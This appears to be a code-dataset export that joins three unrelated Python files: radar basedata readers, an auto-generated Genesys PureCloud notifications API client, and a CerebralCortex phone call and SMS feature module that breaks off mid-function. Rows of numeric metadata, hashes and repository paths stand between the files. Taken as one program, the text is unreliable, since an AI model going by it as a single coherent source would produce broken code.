def read_auto(filename, station_lon=None, station_lat=None, station_alt=None):
    """
    Auto-detect the radar file format and load the file as a PRD object.

    :param filename: radar basedata filename
    :param station_lon: radar station longitude //units: degree east
    :param station_lat: radar station latitude //units:degree north
    :param station_alt: radar station altitude //units: meters
    """
    # Map each recognized format to its (BaseData reader, NRadar converter) pair.
    readers = {
        "WSR98D": (WSR98DFile.WSR98DBaseData, WSR98DFile.WSR98D2NRadar),
        "SAB": (SABFile.SABBaseData, SABFile.SAB2NRadar),
        "CC": (CCFile.CCBaseData, CCFile.CC2NRadar),
        "SC": (SCFile.SCBaseData, SCFile.SC2NRadar),
        "PA": (PAFile.PABaseData, PAFile.PA2NRadar),
    }
    radar_type = radar_format(filename)
    if radar_type not in readers:
        raise TypeError("unsupported radar type!")
    base_cls, converter_cls = readers[radar_type]
    return converter_cls(base_cls(filename, station_lon, station_lat, station_alt)).ToPRD()
def read_SAB(filename, station_lon=None, station_lat=None, station_alt=None):
    """
    Read a SAB-format radar basedata file and return it as a PRD object.

    :param filename: radar basedata filename
    :param station_lon: radar station longitude //units: degree east
    :param station_lat: radar station latitude //units:degree north
    :param station_alt: radar station altitude //units: meters
    """
    base_data = SABFile.SABBaseData(filename, station_lon, station_lat, station_alt)
    return SABFile.SAB2NRadar(base_data).ToPRD()
def read_CC(filename, station_lon=None, station_lat=None, station_alt=None):
    """
    Read a CC-format radar basedata file and return it as a PRD object.

    :param filename: radar basedata filename
    :param station_lon: radar station longitude //units: degree east
    :param station_lat: radar station latitude //units:degree north
    :param station_alt: radar station altitude //units: meters
    """
    base_data = CCFile.CCBaseData(filename, station_lon, station_lat, station_alt)
    return CCFile.CC2NRadar(base_data).ToPRD()
def read_SC(filename, station_lon=None, station_lat=None, station_alt=None):
    """
    Read an SC-format radar basedata file and return it as a PRD object.

    :param filename: radar basedata filename
    :param station_lon: radar station longitude //units: degree east
    :param station_lat: radar station latitude //units:degree north
    :param station_alt: radar station altitude //units: meters
    """
    base_data = SCFile.SCBaseData(filename, station_lon, station_lat, station_alt)
    return SCFile.SC2NRadar(base_data).ToPRD()
def read_WSR98D(filename, station_lon=None, station_lat=None, station_alt=None):
    """
    Read a WSR98D-format radar basedata file and return it as a PRD object.

    :param filename: radar basedata filename
    :param station_lon: radar station longitude //units: degree east
    :param station_lat: radar station latitude //units:degree north
    :param station_alt: radar station altitude //units: meters
    """
    base_data = WSR98DFile.WSR98DBaseData(filename, station_lon, station_lat, station_alt)
    return WSR98DFile.WSR98D2NRadar(base_data).ToPRD()
def read_PA(filename, station_lon=None, station_lat=None, station_alt=None):
    """
    Read a PA-format radar basedata file and return it as a PRD object.

    :param filename: radar basedata filename
    :param station_lon: radar station longitude //units: degree east
    :param station_lat: radar station latitude //units:degree north
    :param station_alt: radar station altitude //units: meters
    """
    base_data = PAFile.PABaseData(filename, station_lon, station_lat, station_alt)
    return PAFile.PA2NRadar(base_data).ToPRD()
| 50.323944
| 123
| 0.736636
| 444
| 3,573
| 5.736486
| 0.121622
| 0.086376
| 0.113074
| 0.098155
| 0.907735
| 0.907735
| 0.907735
| 0.907735
| 0.907735
| 0.907735
| 0
| 0.01133
| 0.16009
| 3,573
| 70
| 124
| 51.042857
| 0.837388
| 0.390988
| 0
| 0.37037
| 0
| 0
| 0.037755
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.074074
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
9a717733af978bd262ece0750855549656f30728
| 23,130
|
py
|
Python
|
libs/PureCloudPlatformClientV2/apis/notifications_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 1
|
2021-10-08T20:46:45.000Z
|
2021-10-08T20:46:45.000Z
|
libs/PureCloudPlatformClientV2/apis/notifications_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
libs/PureCloudPlatformClientV2/apis/notifications_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
NotificationsApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class NotificationsApi(object):
    """
    Client for the PureCloud ``/api/v2/notifications`` endpoints
    (channels, channel subscriptions, and available topics).

    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Use the supplied client, or fall back to (lazily creating) the
        # shared client held by the global Configuration singleton.
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client

    def delete_notifications_channel_subscriptions(self, channel_id, **kwargs):
        """
        Remove all subscriptions

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_notifications_channel_subscriptions(channel_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_id: Channel ID (required)
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['channel_id']
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_notifications_channel_subscriptions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'channel_id' is set
        if ('channel_id' not in params) or (params['channel_id'] is None):
            raise ValueError("Missing the required parameter `channel_id` when calling `delete_notifications_channel_subscriptions`")

        resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
        path_params = {}
        if 'channel_id' in params:
            path_params['channelId'] = params['channel_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'DELETE',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type=None,
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response

    def get_notifications_availabletopics(self, **kwargs):
        """
        Get available notification topics.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_notifications_availabletopics(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param list[str] expand: Which fields, if any, to expand
        :param bool include_preview: Whether or not to include Preview topics
        :return: AvailableTopicEntityListing
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['expand', 'include_preview']
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_notifications_availabletopics" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/api/v2/notifications/availabletopics'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'expand' in params:
            query_params['expand'] = params['expand']
        if 'include_preview' in params:
            query_params['includePreview'] = params['include_preview']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='AvailableTopicEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response

    def get_notifications_channel_subscriptions(self, channel_id, **kwargs):
        """
        The list of all subscriptions for this channel

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_notifications_channel_subscriptions(channel_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_id: Channel ID (required)
        :return: ChannelTopicEntityListing
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['channel_id']
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_notifications_channel_subscriptions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'channel_id' is set
        if ('channel_id' not in params) or (params['channel_id'] is None):
            raise ValueError("Missing the required parameter `channel_id` when calling `get_notifications_channel_subscriptions`")

        resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
        path_params = {}
        if 'channel_id' in params:
            path_params['channelId'] = params['channel_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='ChannelTopicEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response

    def get_notifications_channels(self, **kwargs):
        """
        The list of existing channels

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_notifications_channels(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str includechannels: Show user's channels for this specific token or across all tokens for this user and app. Channel Ids for other access tokens will not be shown, but will be presented to show their existence.
        :return: ChannelEntityListing
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['includechannels']
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_notifications_channels" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/api/v2/notifications/channels'.replace('{format}', 'json')
        path_params = {}

        query_params = {}
        if 'includechannels' in params:
            query_params['includechannels'] = params['includechannels']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='ChannelEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response

    def post_notifications_channel_subscriptions(self, channel_id, body, **kwargs):
        """
        Add a list of subscriptions to the existing list of subscriptions

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_notifications_channel_subscriptions(channel_id, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_id: Channel ID (required)
        :param list[ChannelTopic] body: Body (required)
        :return: ChannelTopicEntityListing
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['channel_id', 'body']
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_notifications_channel_subscriptions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'channel_id' is set
        if ('channel_id' not in params) or (params['channel_id'] is None):
            raise ValueError("Missing the required parameter `channel_id` when calling `post_notifications_channel_subscriptions`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `post_notifications_channel_subscriptions`")

        resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
        path_params = {}
        if 'channel_id' in params:
            path_params['channelId'] = params['channel_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'POST',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='ChannelTopicEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response

    def post_notifications_channels(self, **kwargs):
        """
        Create a new channel

        There is a limit of 20 channels per user/app combination. Creating a 21st channel will remove the channel with oldest last used date. Channels without an active connection will be removed first.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.post_notifications_channels(callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :return: Channel
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method post_notifications_channels" % key
                )
            params[key] = val
        del params['kwargs']

        resource_path = '/api/v2/notifications/channels'.replace('{format}', 'json')
        path_params = {}

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'POST',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='Channel',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response

    def put_notifications_channel_subscriptions(self, channel_id, body, **kwargs):
        """
        Replace the current list of subscriptions with a new list.

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.put_notifications_channel_subscriptions(channel_id, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str channel_id: Channel ID (required)
        :param list[ChannelTopic] body: Body (required)
        :return: ChannelTopicEntityListing
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['channel_id', 'body']
        all_params.append('callback')

        params = locals()
        # Reject any keyword argument this endpoint does not define.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method put_notifications_channel_subscriptions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'channel_id' is set
        if ('channel_id' not in params) or (params['channel_id'] is None):
            raise ValueError("Missing the required parameter `channel_id` when calling `put_notifications_channel_subscriptions`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `put_notifications_channel_subscriptions`")

        resource_path = '/api/v2/notifications/channels/{channelId}/subscriptions'.replace('{format}', 'json')
        path_params = {}
        if 'channel_id' in params:
            path_params['channelId'] = params['channel_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'PUT',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='ChannelTopicEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
| 38.743719
| 227
| 0.559014
| 2,229
| 23,130
| 5.614177
| 0.109018
| 0.031645
| 0.024932
| 0.021256
| 0.836583
| 0.832747
| 0.831629
| 0.824357
| 0.813089
| 0.813089
| 0
| 0.001492
| 0.362516
| 23,130
| 596
| 228
| 38.808725
| 0.847202
| 0.279464
| 0
| 0.806557
| 0
| 0
| 0.184776
| 0.058801
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02623
| false
| 0
| 0.022951
| 0
| 0.07541
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9a75aa4695d19c9f81142de9801ffff7f439092f
| 147,813
|
py
|
Python
|
core/admission_control_marker/phone_features.py
|
MD2Korg/CerebralCortex-DataDebugger
|
f2e34337cd7e47fde77a7ccad32ea55da972caec
|
[
"BSD-2-Clause"
] | null | null | null |
core/admission_control_marker/phone_features.py
|
MD2Korg/CerebralCortex-DataDebugger
|
f2e34337cd7e47fde77a7ccad32ea55da972caec
|
[
"BSD-2-Clause"
] | null | null | null |
core/admission_control_marker/phone_features.py
|
MD2Korg/CerebralCortex-DataDebugger
|
f2e34337cd7e47fde77a7ccad32ea55da972caec
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2018, MD2K Center of Excellence
# - Md Shiplu Hawlader <shiplu.cse.du@gmail.com; mhwlader@memphis.edu>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
from cerebralcortex.core.datatypes.datastream import DataStream
from cerebralcortex.core.datatypes.datastream import DataPoint
from cerebralcortex.core.datatypes.stream_types import StreamTypes
from core.computefeature import ComputeFeatureBase
from urllib.request import urlopen
from bs4 import BeautifulSoup
import datetime
import numpy as np
from datetime import timedelta
import time
import copy
import traceback
from functools import lru_cache
import math
import base64
import pickle
from sklearn.mixture import GaussianMixture
from typing import List, Callable, Any
# Name of the feature class in this module; presumably read by the
# ComputeFeature framework's loader -- verify against the framework.
feature_class_name = 'PhoneFeatures'

# Constants
# Activity-type codes carried by phone activity samples.
# NOTE(review): these look like Google Activity Recognition DetectedActivity
# codes stored as floats -- confirm against the upstream data source.
IN_VEHICLE = 6.0
ON_BICYCLE = 5.0
STILL = 0.0
ON_FOOT = 1.0
TILTING = 2.0
WALKING = 3.0
RUNNING = 4.0
UNKNOWN = 7.0
# Call-log type code for an outgoing call.
OUTGOING_TYPE = 2.0
# SMS-log type code for a sent message.
MESSAGE_TYPE_SENT = 2.0
class PhoneFeatures(ComputeFeatureBase):
"""
This class is responsible for computing features based on streams of data
derived from the smartphone sensors.
"""
def get_filtered_data(self, data: List[DataPoint],
admission_control: Callable[[Any], bool] = None) -> List[DataPoint]:
"""
Return the filtered list of DataPoints according to the admission control provided
:param List(DataPoint) data: Input data list
:param Callable[[Any], bool] admission_control: Admission control lambda function, which accepts the sample and
returns a bool based on the data sample validity
:return: Filtered list of DataPoints
:rtype: List(DataPoint)
"""
if admission_control is None:
return data
filtered_data = []
for d in data:
if admission_control(d.sample):
filtered_data.append(d)
elif type(d.sample) is list and len(d.sample) == 1 and admission_control(d.sample[0]):
d.sample = d.sample[0]
filtered_data.append(d)
return filtered_data
def get_data_by_stream_name(self, stream_name: str, user_id: str, day: str,
localtime: bool=True, ingested_stream=True) -> List[DataPoint]:
"""
Combines data from multiple streams data of same stream based on stream name.
:param str stream_name: Name of the stream
:param str user_id: UUID of the stream owner
:param str day: The day (YYYYMMDD) on which to operate
:param bool localtime: The way to structure time, True for operating in participant's local time, False for UTC
:return: Combined stream data if there are multiple stream id
:rtype: List(DataPoint)
"""
if ingested_stream:
stream_ids = self.CC.get_stream_id(user_id, stream_name)
else:
stream_ids = self.get_latest_stream_id(user_id, stream_name)
data = []
for stream in stream_ids:
if stream is not None:
ds = self.CC.get_stream(stream['identifier'], user_id=user_id, day=day, localtime=localtime)
if ds is not None:
if ds.data is not None:
data += ds.data
if len(stream_ids) > 1:
data = sorted(data, key=lambda x: x.start_time)
return data
def inter_event_time_list(self, data: List[DataPoint]) -> List[float]:
"""
Helper function to compute inter-event times
:param List(DataPoint) data: A list of DataPoints
:return: Time deltas between DataPoints in minutes
:rtype: list(float)
"""
if len(data) == 0:
return None
last_end = data[0].end_time
ret = []
flag = False
for cd in data:
if flag == False:
flag = True
continue
dif = cd.start_time - last_end
ret.append(max(0, dif.total_seconds()))
last_end = max(last_end, cd.end_time)
return list(map(lambda x: x / 60.0, ret))
    def average_inter_phone_call_sms_time_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint]) -> List[DataPoint]:
        """
        Average time (in minutes) between two consecutive events (call and sms)
        for each hour window. If there is not enough data for a window then
        there will be no data point for that window.

        :param List(DataPoint) phonedata: Phone call DataStream
        :param List(DataPoint) smsdata: SMS DataStream
        :return: Average inter-phone call and sms time over 1 hour windows
        :rtype: List(DataPoint) or None
        """
        tmpphonestream = self.get_filtered_data(phonedata)
        tmpsmsstream = self.get_filtered_data(smsdata)
        # At least two events are needed to form any inter-event gap.
        if len(tmpphonestream) + len(tmpsmsstream) <= 1:
            return None
        # Call samples hold the call duration in seconds; derive each call's
        # end. NOTE(review): the filtered lists alias the input DataPoints,
        # so these end_time updates are visible through phonedata/smsdata.
        for s in tmpphonestream:
            s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
        for s in tmpsmsstream:
            s.end_time = s.start_time

        # NOTE(review): combines the *unfiltered* inputs; since
        # get_filtered_data is called above without an admission_control it
        # returns the same lists, so the two coincide today -- confirm if
        # an admission control is ever added here.
        combined_data = phonedata + smsdata
        combined_data.sort(key=lambda x: x.start_time)

        new_data = []
        # Anchor the 24 hourly windows at midnight of the earliest event's day.
        tmp_time = copy.deepcopy(combined_data[0].start_time)
        tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
        for h in range(0, 24):
            datalist = []
            start = tmp_time.replace(hour=h)
            end = start + datetime.timedelta(minutes=59)
            # Collect events that start or end inside this window.
            for d in combined_data:
                if start <= d.start_time <= end or start <= d.end_time <= end:
                    datalist.append(d)
            # Skip windows that cannot yield a gap (fewer than two events).
            if len(datalist) <= 1:
                continue
            new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
                                      sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))

        return new_data
def average_inter_phone_call_sms_time_four_hourly(self, phonedata: List[DataPoint], smsdata: List[DataPoint]) \
        -> List[DataPoint]:
    """
    Average time (in minutes) between two consecutive events (call and sms)
    for each four hour window. If there is not enough data for a window then
    there will be no data point for that window.

    :param List(DataPoint) phonedata: Phone call DataStream
    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average inter-phone call and sms time over 4 hour windows
    :rtype: List(DataPoint) or None
    """
    tmpphonestream = self.get_filtered_data(phonedata)
    tmpsmsstream = self.get_filtered_data(smsdata)
    if len(tmpphonestream) + len(tmpsmsstream) <= 1:
        return None
    # Calls span their duration (sample is seconds); SMS are instantaneous.
    for s in tmpphonestream:
        s.end_time = s.start_time + datetime.timedelta(seconds=s.sample)
    for s in tmpsmsstream:
        s.end_time = s.start_time
    # BUG FIX: combine the *filtered* streams. The original combined the raw
    # phonedata + smsdata, so points rejected by get_filtered_data (whose
    # end_time was never set above) leaked into the four-hour windows.
    combined_data = tmpphonestream + tmpsmsstream
    combined_data.sort(key=lambda x: x.start_time)
    new_data = []
    tmp_time = copy.deepcopy(combined_data[0].start_time)
    tmp_time = tmp_time.replace(hour=0, minute=0, second=0, microsecond=0)
    for h in range(0, 24, 4):
        start = tmp_time.replace(hour=h)
        end = start + datetime.timedelta(hours=3, minutes=59)
        # An event belongs to the window if it starts or ends inside it.
        datalist = [d for d in combined_data
                    if start <= d.start_time <= end or start <= d.end_time <= end]
        if len(datalist) <= 1:
            continue
        new_data.append(DataPoint(start_time=start, end_time=end, offset=combined_data[0].offset,
                                  sample=sum(self.inter_event_time_list(datalist)) / (len(datalist) - 1)))
    return new_data
def average_inter_phone_call_sms_time_daily(self, phonedata: List[DataPoint], smsdata: List[DataPoint])\
        -> List[DataPoint]:
    """
    Average time (in minutes) between two consecutive events (call and sms)
    over the whole day. Returns None when fewer than two events exist.

    :param List(DataPoint) phonedata: Phone call DataStream
    :param List(DataPoint) smsdata: SMS DataStream
    :return: Average inter-phone call and sms time over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) + len(smsdata) <= 1:
        return None
    # Calls span their duration (sample is seconds); SMS are instantaneous.
    for call in phonedata:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    for msg in smsdata:
        msg.end_time = msg.start_time
    events = sorted(phonedata + smsdata, key=lambda ev: ev.start_time)
    first = events[0].start_time
    day_start = datetime.datetime(year=first.year, month=first.month,
                                  day=first.day, tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
    mean_gap = sum(self.inter_event_time_list(events)) / (len(events) - 1)
    return [DataPoint(start_time=day_start, end_time=day_end,
                      offset=events[0].offset, sample=mean_gap)]
def variance_inter_phone_call_sms_time_daily(self, phonedata: List[DataPoint], smsdata: List[DataPoint]) \
        -> List[DataPoint]:
    """
    Variance of time (in minutes) between two consecutive events (call and
    sms) over the whole day. Returns None when fewer than two events exist.

    :param List(DataPoint) phonedata: Phone call DataStream
    :param List(DataPoint) smsdata: SMS DataStream
    :return: Variance of inter-phone call and sms time over 1 day windows
    :rtype: List(DataPoint) or None
    """
    if len(phonedata) + len(smsdata) <= 1:
        return None
    # Calls span their duration (sample is seconds); SMS are instantaneous.
    for call in phonedata:
        call.end_time = call.start_time + datetime.timedelta(seconds=call.sample)
    for msg in smsdata:
        msg.end_time = msg.start_time
    events = sorted(phonedata + smsdata, key=lambda ev: ev.start_time)
    first = events[0].start_time
    day_start = datetime.datetime(year=first.year, month=first.month,
                                  day=first.day, tzinfo=first.tzinfo)
    day_end = day_start + datetime.timedelta(hours=23, minutes=59)
